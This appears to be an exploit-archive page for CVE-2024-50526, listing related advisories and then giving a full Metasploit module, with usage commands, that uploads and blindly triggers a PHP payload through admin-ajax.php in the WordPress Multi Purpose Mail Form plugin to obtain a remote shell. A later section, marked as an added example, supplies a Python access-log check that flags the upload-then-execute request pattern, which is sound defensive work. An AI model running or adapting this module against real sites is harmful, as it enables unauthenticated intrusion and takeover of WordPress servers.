| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for Unrestricted Upload of File with Dangerous Type in Lindeni Multi_Purpose_Mail_Form | 22 Jan 2026 19:27 | – | githubexploit |
| CVE-2024-50526 | 4 Nov 2024 14:15 | – | attackerkb |
| CVE-2024-50526 | 4 Nov 2024 16:06 | – | circl |
| WordPress plugin Multi Purpose Mail Form code issue vulnerability | 4 Nov 2024 00:00 | – | cnnvd |
| CVE-2024-50526 | 4 Nov 2024 13:43 | – | cve |
| CVE-2024-50526 WordPress Multi Purpose Mail Form plugin <= 1.0.2 - Arbitrary File Upload vulnerability | 4 Nov 2024 13:43 | – | cvelist |
| EUVD-2024-44939 | 3 Oct 2025 20:07 | – | euvd |
| CVE-2024-50526 | 4 Nov 2024 14:15 | – | nvd |
| CVE-2024-50526 | 4 Nov 2024 14:15 | – | osv |
| WordPress Multi Purpose Mail Form plugin <= 1.0.2 - Arbitrary File Upload vulnerability | 30 Oct 2024 10:50 | – | patchstack |

=============================================================================================================================================
| # Title : WordPress MPMF Plugin 1.0.2 Unauthenticated File Upload Remote Code Execution |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://wordpress.org/plugins/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/214232/ & CVE-2024-50526
[+] Summary : This Metasploit module exploits an unauthenticated file upload vulnerability in the WordPress Multi‑Purpose Multi‑Form (MPMF) plugin.
By abusing a vulnerable AJAX action exposed via admin-ajax.php, an attacker can upload a crafted PHP file and trigger its execution to obtain remote code execution.
Due to variations in plugin versions and upload paths, the module follows a conservative and transparent exploitation approach.
It does not rely on unreliable automatic detection or strict success indicators. Instead, it prioritizes correct handler ordering to avoid race conditions,
supports blind triggering of the uploaded payload, and performs best‑effort cleanup where possible.
[+] Usage :
use exploit/multi/http/wp_mpmf_rce
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set TARGETURI /
exploit
[+] POC :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WordPress MPMF Plugin Unauthenticated RCE',
        'Description' => %q{
          This module exploits an unauthenticated file upload vulnerability in the
          Multi-Purpose Multi-Form (MPMF) WordPress plugin. It uploads a PHP payload
          via admin-ajax.php and executes it to gain a shell. The module handles
          logic sequencing and session persistence automatically.
        },
        'Author' => ['indoushka'],
        'License' => MSF_LICENSE,
        'References' => [['CVE', '2024-50526']],
        'Privileged' => false,
        'Platform' => 'php',
        'Arch' => ARCH_PHP,
        'Payload' => {
          'Compat' => { 'PayloadType' => 'php' },
          'BadChars' => "\x00"
        },
        'Targets' => [['WordPress / PHP', {}]],
        'DisclosureDate' => '2024-10-24',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [UNRELIABLE_SESSION],
          'SideEffects' => [ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      OptString.new('TARGETURI', [true, 'The base path to WordPress', '/']),
      OptString.new('AJAX_ACTION', [true, 'The AJAX action handled by the plugin', 'send_data']),
      OptString.new('FORM_ID', [true, 'The target mpmf_form_id', '1']),
      OptString.new('WP_UPLOAD_DIR', [true, 'Relative upload path', 'wp-content/uploads/mpmf_uploads'])
    ])
  end

  def check
    CheckCode::Unknown('Manual verification required: check plugin directory and AJAX endpoint response.')
  end

  def exploit
    filename = "#{Rex::Text.rand_text_alpha_lower(8)}.php"
    php_payload = "<?php #{payload.encoded} ?>"
    clean_upload_dir = datastore['WP_UPLOAD_DIR'].sub(%r{^/}, '').sub(%r{/$}, '')

    data = Rex::MIME::Message.new
    data.add_part(datastore['AJAX_ACTION'], nil, nil, 'form-data; name="action"')
    data.add_part(datastore['FORM_ID'], nil, nil, 'form-data; name="mpmf_form_id"')
    data.add_part('1', nil, nil, 'form-data; name="count_files"')
    data.add_part('1', nil, nil, 'form-data; name="count"')
    data.add_part(php_payload, 'application/octet-stream', 'binary', "form-data; name=\"file1\"; filename=\"#{filename}\"")

    print_status("Uploading payload #{filename}...")
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
      'ctype' => "multipart/form-data; boundary=#{data.bound}",
      'data' => data.to_s
    })
    fail_with(Failure::UnexpectedReply, "Upload failed (HTTP Code: #{res&.code})") unless res&.code == 200

    register_file_for_cleanup(File.join(clean_upload_dir, filename))
    upload_uri = normalize_uri(target_uri.path, clean_upload_dir, filename)

    print_status("Starting handler and waiting for session...")
    handler

    print_status("Triggering payload (Blind) via: #{upload_uri}")
    send_request_cgi({
      'method' => 'GET',
      'uri' => upload_uri
    }, 5)
  end
end
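
In a web server access log, the module's two requests appear as a POST to admin-ajax.php followed by a request for a .php file under the uploads tree. The following Python log check is an added example, not part of the original advisory or module; the Combined Log Format, the 60-second correlation window, the function names and the sample lines are assumptions.

```python
import re
from datetime import datetime, timedelta

# Combined Log Format prefix: ip ident user [time] "METHOD path PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
AJAX_RE = re.compile(r'/wp-admin/admin-ajax\.php(?:\?|$)')
# Any PHP script requested from the uploads tree. The module defaults to
# wp-content/uploads/mpmf_uploads, but that path is an option, so match broadly.
UPLOADED_PHP_RE = re.compile(r'/wp-content/uploads/[^?]*\.php(?:[/?]|$)', re.I)
WINDOW = timedelta(seconds=60)  # assumed correlation window

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [04/Nov/2024:10:00:01 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 58 "-" "-"',
    '203.0.113.7 - - [04/Nov/2024:10:00:03 +0000] "GET /wp-content/uploads/mpmf_uploads/qkzvbnta.php HTTP/1.1" 200 0 "-" "-"',
    '198.51.100.9 - - [04/Nov/2024:10:05:00 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 120 "-" "-"',
    '198.51.100.9 - - [04/Nov/2024:10:05:02 +0000] "GET /wp-content/uploads/2024/11/photo.jpg HTTP/1.1" 200 48211 "-" "-"',
    '192.0.2.44 - - [04/Nov/2024:11:00:00 +0000] "GET /wp-content/uploads/old/x.php HTTP/1.1" 404 0 "-" "-"',
]


def parse(line):
    """Return (ip, time, method, path, status), or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m['ts'], '%d/%b/%Y:%H:%M:%S %z')
    return m['ip'], ts, m['method'], m['path'], int(m['status'])


def find_upload_then_execute(lines, window=WINDOW):
    """Flag PHP requests under uploads; 'high' if the same client made a
    successful admin-ajax.php POST within `window` beforehand."""
    last_ajax_post = {}  # client ip -> time of last 200 POST to admin-ajax.php
    findings = []
    for rec in filter(None, map(parse, lines)):
        ip, ts, method, path, status = rec
        if method == 'POST' and status == 200 and AJAX_RE.search(path):
            last_ajax_post[ip] = ts
        elif UPLOADED_PHP_RE.search(path):
            post_ts = last_ajax_post.get(ip)
            hit = post_ts is not None and timedelta(0) <= ts - post_ts <= window
            findings.append({'ip': ip, 'path': path, 'status': status,
                             'severity': 'high' if hit else 'medium'})
    return findings
```

Access logs do not record the multipart body, so the `action` and `mpmf_form_id` fields are not visible here; the correlation relies on request order per client IP.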
Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================